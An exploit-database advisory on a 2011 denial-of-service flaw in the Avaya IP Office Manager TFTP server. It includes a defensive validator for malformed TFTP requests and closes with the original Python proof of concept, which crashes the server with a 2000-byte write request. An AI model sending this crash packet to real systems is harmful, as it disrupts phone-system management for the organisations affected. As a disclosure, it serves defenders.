Vendor: IP Office Manager
By: Craig Freyman (cd1zz)
CVSS: 7.5 (HIGH)
Denial of Service
CWE: 400
Product Name: IP Office Manager
Affected Version From: Avaya IP Office Manager 8.1 (5)
Affected Version To: Avaya IP Office Manager 8.1 (5)
Patch Exists: NO
Related CWE: N/A
CPE: a:avaya:ip_office_manager:8.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP3
2011

Avaya IP Office Manager TFTP DOS

Avaya IP Office Manager is the management console for Avaya IP Office phone systems. It includes a built-in TFTP server that is used to update the firmware on phones, and the TFTP service is loaded when the admin console is opened. An attacker can send a crafted packet containing 2000 "A" characters to the TFTP server, which causes the server to crash.

Mitigation:

Disable the TFTP service if it is not needed.
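
Added example (not part of the original advisory or the Exploit-DB entry): a validator for TFTP request payloads that flags the malformed shape described above, where the request is a write request (opcode 2) whose mode field is 2000 bytes long instead of one of the RFC 1350 mode names. The size limits and the function name check_tftp_request are assumptions chosen for illustration; the sample packets are constructed.

```python
import struct

RRQ, WRQ = 1, 2
VALID_MODES = {b"netascii", b"octet", b"mail"}  # mode names defined by RFC 1350
MAX_REQUEST_LEN = 512    # assumption: local policy limit, not an RFC value
MAX_FILENAME_LEN = 255   # assumption: local policy limit


def check_tftp_request(payload: bytes) -> list:
    """Return findings for one UDP/69 payload; an empty list means it looks sane."""
    findings = []
    if len(payload) < 4:
        return ["truncated packet"]
    (opcode,) = struct.unpack("!H", payload[:2])
    if opcode not in (RRQ, WRQ):
        return [f"unexpected opcode {opcode} on request port"]
    if len(payload) > MAX_REQUEST_LEN:
        findings.append(f"oversized request ({len(payload)} bytes)")
    # Request body layout: filename NUL mode NUL [option NUL value NUL ...]
    fields = payload[2:].split(b"\x00")
    if payload[-1:] != b"\x00" or len(fields) < 3:
        findings.append("missing NUL terminator")
        return findings
    filename, mode = fields[0], fields[1]
    if not filename or len(filename) > MAX_FILENAME_LEN:
        findings.append(f"bad filename length ({len(filename)})")
    if mode.lower() not in VALID_MODES:
        findings.append(f"invalid mode field ({len(mode)} bytes)")
    return findings


# Constructed sample payloads (not captured traffic).
SAMPLES = {
    "firmware read": b"\x00\x01firmware.bin\x00octet\x00",
    "long mode field": b"\x00\x02A\x00" + b"A" * 2000 + b"\x00",
    "unterminated": b"\x00\x02A\x00octet",
}

if __name__ == "__main__":
    for name, pkt in SAMPLES.items():
        print(name, "->", check_tftp_request(pkt) or "ok")
```

The same checks translate directly to an IDS rule or a UDP filter placed in front of the management workstation.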

Exploit-DB raw data:

#Exploit Title: Avaya IP Office Manager TFTP DOS
#Version: Avaya IP Office Manager 8.1 (5)
#Author: Craig Freyman (cd1zz)
#Date: March 23, 2011
#Description: Avaya IP Office Manager is the management console for Avaya IP Office phone systems. 
#There is a built in TFTP server that is used to update the firmware on phones. The TFTP service 
#is loaded when the admin console is opened. I was not able to overwrite any registers or the SEH.
#Software Link: ftp://ftp.avaya.com/incoming/Up1cku9/SoftwarePub/6_1GA_Builds/ADMIN6_1_5.exe
#Tested on: Windows XP SP3

#!/usr/bin/python
import socket

host = '192.168.133.131'
port = 69

s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

crash = "A" * 2000

print "Sending crash...."
pwned = "\x00\x02" + "A" + "\x00" + crash + "\x00"
s.sendto(pwned, (host, port))